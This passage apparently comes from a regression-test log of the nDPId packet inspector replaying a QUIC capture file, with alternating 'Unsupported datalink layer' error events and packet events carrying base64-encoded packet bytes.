5VBYCIqgUOScUBuWIk+ApLzNET4zbs4gIfxja61Ni1bQuPMKnW9BxY+UXrPZtTsxcnRkWgrb5NBGoTGM4FV\/07l4b1sJ94lkk56rLdgdhtdOGtnQuM3Qvi2z1GprLuRL6s\/61ge8oGFyOsmdaQ+\/mAC+zvjvRlp1r729pOWheLhgaDm4ZhDf21AaL8aNhQTwZONuVIAQKwpTC9rXdZldiVNzSNDZjz9DE0LcUnZTGOlGasmbc3dpMLzj7RjKvDb88bSY3OCJXPlX4y9CXkr6xuk1hJSaZHfqmVmfd7V4a\/LwEfzCxKGjRvCDGoj8ZgbzUjT+HPvVqrxnprIZadbnj7py3pe02m9Ir+oYPbrzpQ4HFE+3s27Ki5anTeC3D01fjoR4qlymJ59LKD6zJElqooeWC7aK7JUnD76wtmSIeVBnAvkuSJDy7JN9i6fGOpdAVgxKN1ohT29UJ9eJweLFDBE7qmWQB409RqlzYHHzgm\/uv9mFltHeI="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":179,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02005{"packet_event_id":1,"packet_event_name":"packet","packet_id":179,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAEQABZEalnXmHhkgrmKKgBu\/L0BOzRd0JqIItavBEtx+VC8goyWQVjlcgfHXolMwAXmdmr+kGV45WiUWfDhh39xYoH6+DOam+RFT3uBR2Jr6GXMVmiwzaU9sD3m\/ogk17rv+qwL4CL0ye3HJcq+DeN8cb6UlRwVVu9XNCfhKCm0X2nqtiSWOYjsGG15qe\/MGf35WaO2ZoPBZycSSFjQESZGp\/N1BquOeieJ8inN951Qmv7Jnbqt4nwICcmu3oG9dz15HZE8ukna63exMVPanjFGzMLhmYiop1Dx37EjqE78T8imdV9HR9+3exeV7TPyCdM5k5htBjCSh6M4KKSPlI2DUamCKl77q8XRcEr\/py39k3vl2ZhCzun91dodNbwe7cTAhFm3DOJMryiCZAoDwgEv0ZgyRTEkOGEnLPHnyINonSVNYFSwe7mzIMNTl752v6PJQ2bi3rDIE6gCWGEkJo89XDHYcoFyq3pg7M\/F\/I9xU9b4w3kaSUbLDJIYgyCoiCIQc2APpB9ZXEatzKhK9ky4tKkKFKeMEZbV\/iNs23ezgurb16ebx72lEnZ3BwEeV\/v4mbdddbXFeXZiCsk63R94ehQvEXcR5RRWAk8QyYAq0utq0N2cwdDA+mSskxpeZR5UC6BMCAmd81chIGvbRKOseaswIz5ctkcMAqXLvjzSfrfvz1FuLHUfjdJbk89aUO+HvDmeloUxS+jTbaICRwjr51Y5fdWBLAAfYo8G7Pqv70U9QL4hDD5YxQD0gP2dDD4SmkjqjEAqzSpEMehy7Oo2DSvRp5+iuJiQ8OaKfvCxxXasWh6izXuGPIqCkLTdb0o7ChPHZLHq42nZjbWoyF56MqZZJRTCFLPQxovboetxtwPtrXjGacU+Xx4dhl53yeNRvZ+rbYUF64jeoQrsFSPbz7yfE6sm6BNjqqccABrcz4yw+8xqyUAIHW0ctc4pyhb3DdKVEFkcEU3\/Zc8Vli7FGM81+MNkiQJaA8Vnt+dZj8GhVQez0sG7D5LETGAe8jpNZ6EwKPOSE0b\/dJGzjYH8g+QzP5uoQCy4YD4GzvmFGbCETkdRmpLz8enqgY5nQxomRT9DGFuDL9WIA1kqCoCdjqbWYZ0\/w+eWy3mWkXhVAbcRXeDLHO8Zksji3gI7o1a9ea4FJYbkreiwUElcINRbxEF1nDuANbHLp4TeUsHA7GrEXn9abjpqlZrKRFaTAjfiNInzr22+pxUlK58C0tzl5SJtrK75awMv\/Wrlg9iESQBE6IBzpULDFLmm00mHQXnIbkXAh460TYrzsjtluc9YvryEgg83klKtzJHie745m4f2G7NaLCp5Bh72xPOg9cgkpJHnhRVdVj2c+h3XidYMBIWtlbuKhg2vnrj+JhIgke6fTsFEazSYs6yWKmn2fp1kGzzSKGZRAeIFOC4vzG7DEk2xL2S5ulSyPMBxzzO2vf0547wsfugIe1f7thFr2hjgHKuBUboTFzV38YuEGPhANFUikRs35UvOrlGU\/kZhO3yei69wfsC2TxTikJCFzqvZycrZuaKaO6xmEK88UVcWOqgaW0cWRYQBDoTWQ\/zkSIrMbAUQyZNcdekIR5bit+ug6Daisq9bLSzXearwqzWVNPhqgc\/3HedkgNZvGVbn8+nIi88Wt4iaNNbJ1iZb0PkaMIpaKT5yzHF8WvO2tQLNAJZatFeGUL223s="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":180,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02005{"packet_event_id":1,"packet_event_name":"packet","packet_id":180,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAEQABZEalnXmHhkgrmKKgBu\/L0BOzRd0JqIItavBEtx+VC8goyWQVjlcgfHXolMwAXmdmr+kGV45WiUWfDhh39xYoH6+DOam+RFT3uBR2Jr6GXMVmiwzaU9sD3m\/ogk17rv+qwL4CL0ye3HJcq+DeN8cb6UlRwVVu9XNCfhKCm0X2nqtiSWOYjsGG15qe\/MGf35WaO2ZoPBZycSSFjQESZGp\/N1BquOeieJ8inN951Qmv7Jnbqt4nwICcmu3oG9dz15HZE8ukna63exMVPanjFGzMLhmYiop1Dx37EjqE78T8imdV9HR9+3exeV7TPyCdM5k5htBjCSh6M4KKSPlI2DUamCKl77q8XRcEr\/py39k3vl2ZhCzun91dodNbwe7cTAhFm3DOJMryiCZAoDwgEv0ZgyRTEkOGEnLPHnyINonSVNYFSwe7mzIMNTl752v6PJQ2bi3rDIE6gCWGEkJo89XDHYcoFyq3pg7M\/F\/I9xU9b4w3kaSUbLDJIYgyCoiCIQc2APpB9ZXEatzKhK9ky4tKkKFKeMEZbV\/iNs23ezgurb16ebx72lEnZ3BwEeV\/v4mbdddbXFeXZiCsk63R94ehQvEXcR5RRWAk8QyYAq0utq0N2cwdDA+mSskxpeZR5UC6BMCAmd81chIGvbRKOseaswIz5ctkcMAqXLvjzSfrfvz1FuLHUfjdJbk89aUO+HvDmeloUxS+jTbaICRwjr51Y5fdWBLAAfYo8G7Pqv70U9QL4hDD5YxQD0gP2dDD4SmkjqjEAqzSpEMehy7Oo2DSvRp5+iuJiQ8OaKfvCxxXasWh6izXuGPIqCkLTdb0o7ChPHZLHq42nZjbWoyF56MqZZJRTCFLPQxovboetxtwPtrXjGacU+Xx4dhl53yeNRvZ+rbYUF64jeoQrsFSPbz7yfE6sm6BNjqqccABrcz4yw+8xqyUAIHW0ctc4pyhb3DdKVEFkcEU3\/Zc8Vli7FGM81+MNkiQJaA8Vnt+dZj8GhVQez0sG7D5LETGAe8jpNZ6EwKPOSE0b\/dJGzjYH8g+QzP5uoQCy4YD4GzvmFGbCETkdRmpLz8enqgY5nQxomRT9DGFuDL9WIA1kqCoCdjqbWYZ0\/w+eWy3mWkXhVAbcRXeDLHO8Zksji3gI7o1a9ea4FJYbkreiwUElcINRbxEF1nDuANbHLp4TeUsHA7GrEXn9abjpqlZrKRFaTAjfiNInzr22+pxUlK58C0tzl5SJtrK75awMv\/Wrlg9iESQBE6IBzpULDFLmm00mHQXnIbkXAh460TYrzsjtluc9YvryEgg83klKtzJHie745m4f2G7NaLCp5Bh72xPOg9cgkpJHnhRVdVj2c+h3XidYMBIWtlbuKhg2vnrj+JhIgke6fTsFEazSYs6yWKmn2fp1kGzzSKGZRAeIFOC4vzG7DEk2xL2S5ulSyPMBxzzO2vf0547wsfugIe1f7thFr2hjgHKuBUboTFzV38YuEGPhANFUikRs35UvOrlGU\/kZhO3yei69wfsC2TxTikJCFzqvZycrZuaKaO6xmEK88UVcWOqgaW0cWRYQBDoTWQ\/zkSIrMbAUQyZNcdekIR5bit+ug6Daisq9bLSzXearwqzWVNPhqgc\/3HedkgNZvGVbn8+nIi88Wt4iaNNbJ1iZb0PkaMIpaKT5yzHF8WvO2tQLNAJZatFeGUL223s="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":181,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02005{"packet_event_id":1,"packet_event_name":"packet","packet_id":181,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAAEQABZEakvXmHhkgrmKKgBu\/L0BOzRd0JqIItavBEtx+VC8goyWQVjlcgfHXolMwAXmdmr+kGV45WiUWfDhh39xYoH6+DOam+RFT3uBR2Jr6GXMVmiwzaU9sD3m\/ogk17rv+qwL4CL0ye3HJcq+DeN8cb6UlRwVVu9XNCfhKCm0X2nqtiSWOYjsGG15qe\/MGf35WaO2ZoPBZycSSFjQESZGp\/N1BquOeieJ8inN951Qmv7Jnbqt4nwICcmu3oG9dz15HZE8ukna63exMVPanjFGzMLhmYiop1Dx37EjqE78T8imdV9HR9+3exeV7TPyCdM5k5htBjCSh6M4KKSPlI2DUamCKl77q8XRcEr\/py39k3vl2ZhCzun91dodNbwe7cTAhFm3DOJMryiCZAoDwgEv0ZgyRTEkOGEnLPHnyINonSVNYFSwe7mzIMNTl752v6PJQ2bi3rDIE6gCWGEkJo89XDHYcoFyq3pg7M\/F\/I9xU9b4w3kaSUbLDJIYgyCoiCIQc2APpB9ZXEatzKhK9ky4tKkKFKeMEZbV\/iNs23ezgurb16ebx72lEnZ3BwEeV\/v4mbdddbXFeXZiCsk63R94ehQvEXcR5RRWAk8QyYAq0utq0N2cwdDA+mSskxpeZR5UC6BMCAmd81chIGvbRKOseaswIz5ctkcMAqXLvjzSfrfvz1FuLHUfjdJbk89aUO+HvDmeloUxS+jTbaICRwjr51Y5fdWBLAAfYo8G7Pqv70U9QL4hDD5YxQD0gP2dDD4SmkjqjEAqzSpEMehy7Oo2DSvRp5+iuJiQ8OaKfvCxxXasWh6izXuGPIqCkLTdb0o7ChPHZLHq42nZjbWoyF56MqZZJRTCFLPQxovboetxtwPtrXjGacU+Xx4dhl53yeNRvZ+rbYUF64jeoQrsFSPbz7yfE6sm6BNjqqccABrcz4yw+8xqyUAIHW0ctc4pyhb3DdKVEFkcEU3\/Zc8Vli7FGM81+MNkiQJaA8Vnt+dZj8GhVQez0sG7D5LETGAe8jpNZ6EwKPOSE0b\/dJGzjYH8g+QzP5uoQCy4YD4GzvmFGbCETkdRmpLz8enqgY5nQxomRT9DGFuDL9WIA1kqCoCdjqbWYZ0\/w+eWy3mWkXhVAbcRXeDLHO8Zksji3gI7o1a9ea4FJYbkreiwUElcINRbxEF1nDuANbHLp4TeUsHA7GrEXn9abjpqlZrKRFaTAjfiNInzr22+pxUlK58C0tzl5SJtrK75awMv\/Wrlg9iESQBE6IBzpULDFLmm00mHQXnIbkXAh460TYrzsjtluc9YvryEgg83klKtzJHie745m4f2G7NaLCp5Bh72xPOg9cgkpJHnhRVdVj2c+h3XidYMBIWtlbuKhg2vnrj+JhIgke6fTsFEazSYs6yWKmn2fp1kGzzSKGZRAeIFOC4vzG7DEk2xL2S5ulSyPMBxzzO2vf0547wsfugIe1f7thFr2hjgHKuBUboTFzV38YuEGPhANFUikRs35UvOrlGU\/kZhO3yei69wfsC2TxTikJCFzqvZycrZuaKaO6xmEK88UVcWOqgaW0cWRYQBDoTWQ\/zkSIrMbAUQyZNcdekIR5bit+ug6Daisq9bLSzXearwqzWVNPhqgc\/3HedkgNZvGVbn8+nIi88Wt4iaNNbJ1iZb0PkaMIpaKT5yzHF8WvO2tQLNAJZatFeGUL223s="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":182,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02010{"packet_event_id":1,"packet_event_name":"packet","packet_id":182,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAFQABZEalmXmHhkgrmKKgBu\/L0BOyy+0stsdsChBir1eNxnkqpp00cPp8anUwi6rajYUqZHaPxmRz3Dw2DklQVQFuHpj1TghBKGa40nXOTJapKed+t1zSqtgD8W916d3sW3WMpCH7MhhILL0AZH5E3+Ilo9oAl3jHlj6Q9uUK+a9kSJ85mNXB6e6wuaR9z03h3Ghirzquhk3bumF+EoYZeHK34zH014eiVhSibhdcyJPHx3k+8QB5gJwCZpn6ye0fSjIJON2E1qLtXG67Z3tIx1YMAJhiRXgggwuXxGlh27bnIPrRJcqEzpKiPe1Ww+Bv5AMkRk1b6PneXFU1LBMJLTyWiStqQPQr9KtGkXYvTDDG7wiaMK6S5KTZSXIb\/qaqOPMIaGwdxnQA2Mx5HOWd2iofcBILFmpUXeEad2L+ji22PPBp5L+XE3krToEFAoaqMavTVTc0wjGv8mJJWcxuU\/dLvM\/SQCdl99IBiH2LThoBXkgdGF9FAP9kQdXhpzJOHNvgIL\/QuBYHzsdWODJ6VWqNcRl3rQm2JJAwZLN3A9mjy+CF8Kv3diZW9fKnxyzNUr0iQb+e+CCbsm07jMhWIHvC\/1Gu7FWmVbGgcnIwA7rwKMgFv1o4VE3BEMCLKZSUPPy0y2K\/vtVK+n5Y832\/aALLtK2KNTxLYq0MAdDfhZICV0dJah2ekNfa1BhUHZsImTS7qcvtWGBYvsGOdkZIJEIoCPZdSOP0qFTCT5pCQQkMcYE17F2lrIP97lsFwhrvDxEO4BLdh8TywUVcU4crRtQ40bo9ShCVUs1F4OPvxlFljySznU9oTGlKJp1rsI3g1tXAx4JDQUQ5gOpMxpplXV2xUWiBR\/PDDdDSrYgzUgUH15dSGSsr0isCNqqlsiGpcmdBPnQ\/cvVH1eL+z9rrFXEBXvr0vlb93xePZd82+bCwM\/rqcdAskzG32YjYL41Vb+p75KsLSlrEzOdDd+V0lLa5DWYqeUPi5BpjR6v\/2ihVAIiiZHxjKkaV6nXY3zjQ31BxET\/tBgPIsvyXR8G4Diyzp4jg8Ke9JoqiIbA0Rzq6TBO+XBFp4yN53y8LwdGqUTz7bClX5kNSs5FFoEN9vzOacgV9MyptI1q11BF2wQCvkdX9JUo\/r9OPlA7wLCKjC\/uCKRPWFNrvCNTdOpIXQZb1AlG6qjtL7tqVh68zKO3LsNlRYK7VwjHvQXirP8YcTo2TVPHa70AjqiFhvIjAa1Np449rbFZN\/+kTbc2Z2WD3FgF8y\/Q+LLb5q9YGyc5APMp\/vFnV1q3xzqrOQ2SpHhe0tLsL8zM43ZEf6Zgg7Uo0HMr9qA+xHKnpxlSNPKTV42\/dspfYXjG0\/UlYbK4q5ypvFwibptJHFtDGftDAGayJRx0q6wzb9Ne5+gOccwIbLtnYQF0Z2pylX1n+DYKfbKWMTkAVrhQSrHSTryr2Wv+OIOgNqL+WktZlMXjJElgidl1lDV1qjlLSgQ2EpnmutofrNHLGiqirA7+Kul4c7qIfBIKGKg6jF7SWCXdFt6F3XnQSuTdkSndNeULuv+4fusAD86OsmCz8Lpi+aSXP57RJtNpK8zSoh6kaQgHm1kus+l7IWP17R0BjqvADFWZHZsQ3dcIBql9ck1ITK981hWNEA2bwFKmkmZQc+jOHCvfkx905e8\/3sNkb2Nw1lEVhGTYxONytMAy5kHwk="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":183,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02010{"packet_event_id":1,"packet_event_name":"packet","packet_id":183,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAFQABZEalmXmHhkgrmKKgBu\/L0BOyy+0stsdsChBir1eNxnkqpp00cPp8anUwi6rajYUqZHaPxmRz3Dw2DklQVQFuHpj1TghBKGa40nXOTJapKed+t1zSqtgD8W916d3sW3WMpCH7MhhILL0AZH5E3+Ilo9oAl3jHlj6Q9uUK+a9kSJ85mNXB6e6wuaR9z03h3Ghirzquhk3bumF+EoYZeHK34zH014eiVhSibhdcyJPHx3k+8QB5gJwCZpn6ye0fSjIJON2E1qLtXG67Z3tIx1YMAJhiRXgggwuXxGlh27bnIPrRJcqEzpKiPe1Ww+Bv5AMkRk1b6PneXFU1LBMJLTyWiStqQPQr9KtGkXYvTDDG7wiaMK6S5KTZSXIb\/qaqOPMIaGwdxnQA2Mx5HOWd2iofcBILFmpUXeEad2L+ji22PPBp5L+XE3krToEFAoaqMavTVTc0wjGv8mJJWcxuU\/dLvM\/SQCdl99IBiH2LThoBXkgdGF9FAP9kQdXhpzJOHNvgIL\/QuBYHzsdWODJ6VWqNcRl3rQm2JJAwZLN3A9mjy+CF8Kv3diZW9fKnxyzNUr0iQb+e+CCbsm07jMhWIHvC\/1Gu7FWmVbGgcnIwA7rwKMgFv1o4VE3BEMCLKZSUPPy0y2K\/vtVK+n5Y832\/aALLtK2KNTxLYq0MAdDfhZICV0dJah2ekNfa1BhUHZsImTS7qcvtWGBYvsGOdkZIJEIoCPZdSOP0qFTCT5pCQQkMcYE17F2lrIP97lsFwhrvDxEO4BLdh8TywUVcU4crRtQ40bo9ShCVUs1F4OPvxlFljySznU9oTGlKJp1rsI3g1tXAx4JDQUQ5gOpMxpplXV2xUWiBR\/PDDdDSrYgzUgUH15dSGSsr0isCNqqlsiGpcmdBPnQ\/cvVH1eL+z9rrFXEBXvr0vlb93xePZd82+bCwM\/rqcdAskzG32YjYL41Vb+p75KsLSlrEzOdDd+V0lLa5DWYqeUPi5BpjR6v\/2ihVAIiiZHxjKkaV6nXY3zjQ31BxET\/tBgPIsvyXR8G4Diyzp4jg8Ke9JoqiIbA0Rzq6TBO+XBFp4yN53y8LwdGqUTz7bClX5kNSs5FFoEN9vzOacgV9MyptI1q11BF2wQCvkdX9JUo\/r9OPlA7wLCKjC\/uCKRPWFNrvCNTdOpIXQZb1AlG6qjtL7tqVh68zKO3LsNlRYK7VwjHvQXirP8YcTo2TVPHa70AjqiFhvIjAa1Np449rbFZN\/+kTbc2Z2WD3FgF8y\/Q+LLb5q9YGyc5APMp\/vFnV1q3xzqrOQ2SpHhe0tLsL8zM43ZEf6Zgg7Uo0HMr9qA+xHKnpxlSNPKTV42\/dspfYXjG0\/UlYbK4q5ypvFwibptJHFtDGftDAGayJRx0q6wzb9Ne5+gOccwIbLtnYQF0Z2pylX1n+DYKfbKWMTkAVrhQSrHSTryr2Wv+OIOgNqL+WktZlMXjJElgidl1lDV1qjlLSgQ2EpnmutofrNHLGiqirA7+Kul4c7qIfBIKGKg6jF7SWCXdFt6F3XnQSuTdkSndNeULuv+4fusAD86OsmCz8Lpi+aSXP57RJtNpK8zSoh6kaQgHm1kus+l7IWP17R0BjqvADFWZHZsQ3dcIBql9ck1ITK981hWNEA2bwFKmkmZQc+jOHCvfkx905e8\/3sNkb2Nw1lEVhGTYxONytMAy5kHwk="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":184,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02010{"packet_event_id":1,"packet_event_name":"packet","packet_id":184,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RTgFAAAFQABZEakuXmHhkgrmKKgBu\/L0BOyy+0stsdsChBir1eNxnkqpp00cPp8anUwi6rajYUqZHaPxmRz3Dw2DklQVQFuHpj1TghBKGa40nXOTJapKed+t1zSqtgD8W916d3sW3WMpCH7MhhILL0AZH5E3+Ilo9oAl3jHlj6Q9uUK+a9kSJ85mNXB6e6wuaR9z03h3Ghirzquhk3bumF+EoYZeHK34zH014eiVhSibhdcyJPHx3k+8QB5gJwCZpn6ye0fSjIJON2E1qLtXG67Z3tIx1YMAJhiRXgggwuXxGlh27bnIPrRJcqEzpKiPe1Ww+Bv5AMkRk1b6PneXFU1LBMJLTyWiStqQPQr9KtGkXYvTDDG7wiaMK6S5KTZSXIb\/qaqOPMIaGwdxnQA2Mx5HOWd2iofcBILFmpUXeEad2L+ji22PPBp5L+XE3krToEFAoaqMavTVTc0wjGv8mJJWcxuU\/dLvM\/SQCdl99IBiH2LThoBXkgdGF9FAP9kQdXhpzJOHNvgIL\/QuBYHzsdWODJ6VWqNcRl3rQm2JJAwZLN3A9mjy+CF8Kv3diZW9fKnxyzNUr0iQb+e+CCbsm07jMhWIHvC\/1Gu7FWmVbGgcnIwA7rwKMgFv1o4VE3BEMCLKZSUPPy0y2K\/vtVK+n5Y832\/aALLtK2KNTxLYq0MAdDfhZICV0dJah2ekNfa1BhUHZsImTS7qcvtWGBYvsGOdkZIJEIoCPZdSOP0qFTCT5pCQQkMcYE17F2lrIP97lsFwhrvDxEO4BLdh8TywUVcU4crRtQ40bo9ShCVUs1F4OPvxlFljySznU9oTGlKJp1rsI3g1tXAx4JDQUQ5gOpMxpplXV2xUWiBR\/PDDdDSrYgzUgUH15dSGSsr0isCNqqlsiGpcmdBPnQ\/cvVH1eL+z9rrFXEBXvr0vlb93xePZd82+bCwM\/rqcdAskzG32YjYL41Vb+p75KsLSlrEzOdDd+V0lLa5DWYqeUPi5BpjR6v\/2ihVAIiiZHxjKkaV6nXY3zjQ31BxET\/tBgPIsvyXR8G4Diyzp4jg8Ke9JoqiIbA0Rzq6TBO+XBFp4yN53y8LwdGqUTz7bClX5kNSs5FFoEN9vzOacgV9MyptI1q11BF2wQCvkdX9JUo\/r9OPlA7wLCKjC\/uCKRPWFNrvCNTdOpIXQZb1AlG6qjtL7tqVh68zKO3LsNlRYK7VwjHvQXirP8YcTo2TVPHa70AjqiFhvIjAa1Np449rbFZN\/+kTbc2Z2WD3FgF8y\/Q+LLb5q9YGyc5APMp\/vFnV1q3xzqrOQ2SpHhe0tLsL8zM43ZEf6Zgg7Uo0HMr9qA+xHKnpxlSNPKTV42\/dspfYXjG0\/UlYbK4q5ypvFwibptJHFtDGftDAGayJRx0q6wzb9Ne5+gOccwIbLtnYQF0Z2pylX1n+DYKfbKWMTkAVrhQSrHSTryr2Wv+OIOgNqL+WktZlMXjJElgidl1lDV1qjlLSgQ2EpnmutofrNHLGiqirA7+Kul4c7qIfBIKGKg6jF7SWCXdFt6F3XnQSuTdkSndNeULuv+4fusAD86OsmCz8Lpi+aSXP57RJtNpK8zSoh6kaQgHm1kus+l7IWP17R0BjqvADFWZHZsQ3dcIBql9ck1ITK981hWNEA2bwFKmkmZQc+jOHCvfkx905e8\/3sNkb2Nw1lEVhGTYxONytMAy5kHwk="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":185,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02024{"packet_event_id":1,"packet_event_name":"packet","packet_id":185,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAGQABZEallXmHhkgrmKKgBu\/L0BOwIxk2aOLY1aktI\/WEyizsUIK+VELjLa3GEhZUrIV9mu6umDkJ55dp\/rOD9UMB6mhWyhTsm8mP0x4g9l2ueZhJppkBwGl9UzwYh8W0TVIFWVZg\/70pxpOG5VHV9nJaCCBOb645mxsqDmRNBI\/fTyVy1eBlIiZ29VuVCQfQb8s6mbvIsnVr0bvrcEaKXwN2joe6t8\/CB2gpbVfyK7mEWQp\/XggmFXzVOiEnjebbg1bXX6DTN7jGEKsKlP35mTFDkhaTWAJx4yeqT9suaHl4M36qMWWPSviKdnUAhcGGDWcSX977oLdkhr4BqYCZFsP\/UhpkgXkt+RkB6qLlUbrXRNWOaLe8qeDoQIrIZQEJhp+5b\/JBsbOL8wdz11IVz22Bt8MKqywp9\/sG0Yl4JgcxXdbXcOAhcsMn5K+B8k2FWaLHHb4z8Fzp6CM\/a3R2XEDHzbsrTxpEL7U\/TKGR\/jJiSKFiMCFIIbZGG5nGWX6gvxSQ33tw+SxAeyjhPbLIRVNG+EVFvO70e\/WxaUiIoiWvfNj\/ZJtjhW3Y9lcdd9I7YDuSj\/3nGG5VgFWI2wgWnZ\/jwo\/o5CsDgiPlBhd78ftdjsruQ+I2eEInszzlhfKxMJXwhVvRV9Y\/i9jkzaVXWjCQTLZ5p74VP0EMo95hdGF9fbPaSt9aANBCD9BitG9eXbQlkoWziSM1fBvIuBSvSQMH6+qwUIYLHAcUwCCxkfESr14GooOBiJoOBmyOSxz3GIxsPou3rrGVZNPBNjk+LhlKXjy\/\/ypHS3SHP2e9R8WAyChRwln2XRlY+Otj0gPxEuJu7qtUQIBZYtAfR3DEh0Dnsxle8\/sFt2PH30uWIBv10ssP5Zp2Sd6MTuiXoiKAMu1dvwIYvtaVmY4wRTsBngz2rY25OFibPGkoFWk7rh74\/5\/oqWZMb+Fycquc0bEyEUJCy4gLBmBSytMS2WZZ7RGwwSI9nXmMF2jFcK9\/jDHNV4j+cZrkbe\/qp1L9s+qGJ6\/HW6w2mgZu+tJe5Iwon5n2hlhLqru8BmpTn\/a19TYGmEMZeUNmnmrJoKUp7+eEIIm81BmW2RFKdSXdMERcebkIzZc5AY9pBhw2IUMZi7Wy83P7GecryxL+FCEFKuq4QGpffZZkCjiMrpS6l1EjNcG8iLlKUjB094BgGhCr5Nn6qm3I4qhlwU0GzTYaHjcN79rC6okWcl01c9Uwgg5tFJ6gK9f9fMjrgXl9+7trRO33++6gfX1KBiSQv91vlj2A4M75TPCQFzqXsho52rQygwBeFAWHwZg813G1QrRjqJtNmoeI6hRjCfcbuY091KsP2zzJ7ltTOWpIS3hOrRpWmmzgWCKCSwkCxe0b3J1\/CNs5IyL5k7sDxaGLf7nOUuU7mGhxhm\/Egv\/7cC0hp5K1x+0YQpfGpK19uHAFjoW8DWsSrURJyar761YRUYyrlHNfsWAn\/c\/wqEiRR7SeKtYJcxr+XIX64aLy8NOeLXLNY55DwvK1LoEMeirq5UTIylxBW95s6nus2BbBwBoiQJok9fOhI+q1ZpTQ\/gKysQOkNlnfTwuN6sfSJ2Lbg07rP7PIU+E6OLiSPHZbpcsmF0jxrRmwPgYoDAItOd5RT\/wQLokOeVOhRyB4U3hd9JXYCNaNvwMJTAHhpZEdjTeiFlJxiUCIijjquKlHVc1M="} -00198{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":186,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","global_ts_msec":1593498296975} -02024{"packet_event_id":1,"packet_event_name":"packet","packet_id":186,"source":"quic-mvfst-22_decryption_error.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1280,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":1280,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAFAAAGQABZEallXmHhkgrmKKgBu\/L0BOwIxk2aOLY1aktI\/WEyizsUIK+VELjLa3GEhZUrIV9mu6umDkJ55dp\/rOD9UMB6mhWyhTsm8mP0x4g9l2ueZhJppkBwGl9UzwYh8W0TVIFWVZg\/70pxpOG5VHV9nJaCCBOb645mxsqDmRNBI\/fTyVy1eBlIiZ29VuVCQfQb8s6mbvIsnVr0bvrcEaKXwN2joe6t8\/CB2gpbVfyK7mEWQp\/XggmFXzVOiEnjebbg1bXX6DTN7jGEKsKlP35mTFDkhaTWAJx4yeqT9suaHl4M36qMWWPSviKdnUAhcGGDWcSX977oLdkhr4BqYCZFsP\/UhpkgXkt+RkB6qLlUbrXRNWOaLe8qeDoQIrIZQEJhp+5b\/JBsbOL8wdz11IVz22Bt8MKqywp9\/sG0Yl4JgcxXdbXcOAhcsMn5K+B8k2FWaLHHb4z8Fzp6CM\/a3R2XEDHzbsrTxpEL7U\/TKGR\/jJiSKFiMCFIIbZGG5nGWX6gvxSQ33tw+SxAeyjhPbLIRVNG+EVFvO70e\/WxaUiIoiWvfNj\/ZJtjhW3Y9lcdd9I7YDuSj\/3nGG5VgFWI2wgWnZ\/jwo\/o5CsDgiPlBhd78ftdjsruQ+I2eEInszzlhfKxMJXwhVvRV9Y\/i9jkzaVXWjCQTLZ5p74VP0EMo95hdGF9fbPaSt9aANBCD9BitG9eXbQlkoWziSM1fBvIuBSvSQMH6+qwUIYLHAcUwCCxkfESr14GooOBiJoOBmyOSxz3GIxsPou3rrGVZNPBNjk+LhlKXjy\/\/ypHS3SHP2e9R8WAyChRwln2XRlY+Otj0gPxEuJu7qtUQIBZYtAfR3DEh0Dnsxle8\/sFt2PH30uWIBv10ssP5Zp2Sd6MTuiXoiKAMu1dvwIYvtaVmY4wRTsBngz2rY25OFibPGkoFWk7rh74\/5\/oqWZMb+Fycquc0